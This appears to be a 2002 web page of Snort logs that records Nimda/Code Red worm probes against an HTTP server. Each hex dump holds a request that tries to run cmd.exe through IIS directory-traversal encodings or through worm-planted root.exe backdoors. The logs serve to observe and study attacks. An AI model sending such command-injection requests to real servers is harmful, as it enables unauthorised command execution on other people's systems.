ACK_hole: TCP:80 Nimda/Code Red payloads
snort 1.8.7 logs from assorted probes to TCP:80 http
I'm snipping the TCP connection establishment and teardown; seen one, ya seen 'em all..
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:24.998626 12.237.79.151:4194 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:7507 IpLen:20 DgmLen:124 DF
***AP*** Seq: 0x8BD6984A Ack: 0x68F51042 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358588 3688061
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A lose....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:25.528741 12.237.79.151:4219 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:7559 IpLen:20 DgmLen:122 DF
***AP*** Seq: 0x8BECD6BC Ack: 0x693EB8BB Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358595 3688129
47 45 54 20 2F 4D 53 41 44 43 2F 72 6F 6F 74 2E GET /MSADC/root.
65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F exe?/c+dir HTTP/
31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www..
43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F Connnection: clo
73 65 0D 0A 0D 0A se....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:26.098844 12.237.79.151:4243 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:7615 IpLen:20 DgmLen:132 DF
***AP*** Seq: 0x8C00A5D2 Ack: 0x68BD96F6 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358601 3688191
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:26.668856 12.237.79.151:4257 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:7661 IpLen:20 DgmLen:132 DF
***AP*** Seq: 0x8C0D1B8B Ack: 0x692F3D74 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358606 3688247
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:27.238920 12.237.79.151:4270 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:7716 IpLen:20 DgmLen:148 DF
***AP*** Seq: 0x8C187E1A Ack: 0x69574A8F Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358612 3688303
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:27.748980 12.237.79.151:4291 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:7770 IpLen:20 DgmLen:169 DF
***AP*** Seq: 0x8C295E0F Ack: 0x691CE5D5 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358617 3688354
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 onnnection: clos
65 0D 0A 0D 0A e....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:28.239126 12.237.79.151:4306 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:7804 IpLen:20 DgmLen:169 DF
***AP*** Seq: 0x8C359A1F Ack: 0x6979C242 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358623 3688404
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/..
25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 onnnection: clos
65 0D 0A 0D 0A e....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:28.769127 12.237.79.151:4319 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:7851 IpLen:20 DgmLen:197 DF
***AP*** Seq: 0x8C3FA549 Ack: 0x6936AF5F Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358627 3688453
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c
2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c
2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E /..55../..c1../.
2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ./.../winnt/syst
65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F dir 32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D ection: close...
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:29.509186 12.237.79.151:4334 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:7927 IpLen:20 DgmLen:149 DF
***AP*** Seq: 0x8C4E4087 Ack: 0x69BECF33 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358634 3688507
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D ection: close...
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:31.099333 12.237.79.151:4353 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:8044 IpLen:20 DgmLen:149 DF
***AP*** Seq: 0x8C5FD572 Ack: 0x69C90F88 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358647 3688643
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D ection: close...
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:33.049451 12.237.79.151:4400 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:8184 IpLen:20 DgmLen:149 DF
***AP*** Seq: 0x8C80D6B3 Ack: 0x694F8C03 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358662 3688795
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D ection: close...
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:33.719544 12.237.79.151:4454 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:8294 IpLen:20 DgmLen:149 DF
***AP*** Seq: 0x8CAE755B Ack: 0x69E5D71A Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358677 3688949
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A r dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D ection: close...
0A .
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:34.199665 12.237.79.151:4476 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:8362 IpLen:20 DgmLen:150 DF
***AP*** Seq: 0x8CBF9207 Ack: 0x69446D86 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358682 3688999
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D ir dir HTTP/1.0.
0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host: www..Conn
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
0D 0A ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:34.720002 12.237.79.151:4491 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:8410 IpLen:20 DgmLen:148 DF
***AP*** Seq: 0x8CCA5F67 Ack: 0x69334C96 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358687 3689052
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:35.249763 12.237.79.151:4506 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:8467 IpLen:20 DgmLen:152 DF
***AP*** Seq: 0x8CD7ED75 Ack: 0x6927B9FA Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358693 3689102
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E ir c+dir HTTP/1.
30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host: www..Co
6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nnnection: close
0D 0A 0D 0A ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/07-05:46:35.739756 12.237.79.151:4523 -> 12.82.129.18:80
TCP TTL:117 TOS:0x0 ID:8535 IpLen:20 DgmLen:148 DF
***AP*** Seq: 0x8CE5FB3D Ack: 0x693CDBC6 Win: 0x4470 TcpLen: 32
TCP Options (3) => NOP NOP TS: 358697 3689152
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 2f../winnt/syste
6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:
===============================================================================
Snort processed 144 packets.
Breakdown by protocol: Action Stats:
TCP: 144 (100.000%) ALERTS: 0
UDP: 0 (0.000%) LOGGED: 0
ICMP: 0 (0.000%) PASSED: 0
ARP: 0 (0.000%)
IPv6: 0 (0.000%)
IPX: 0 (0.000%)
OTHER: 0 (0.000%)
===============================================================================
This page last preened by Webmaster jsage@finchhaven.com on:
Last modified: Mon Aug 12 21:19:07 2002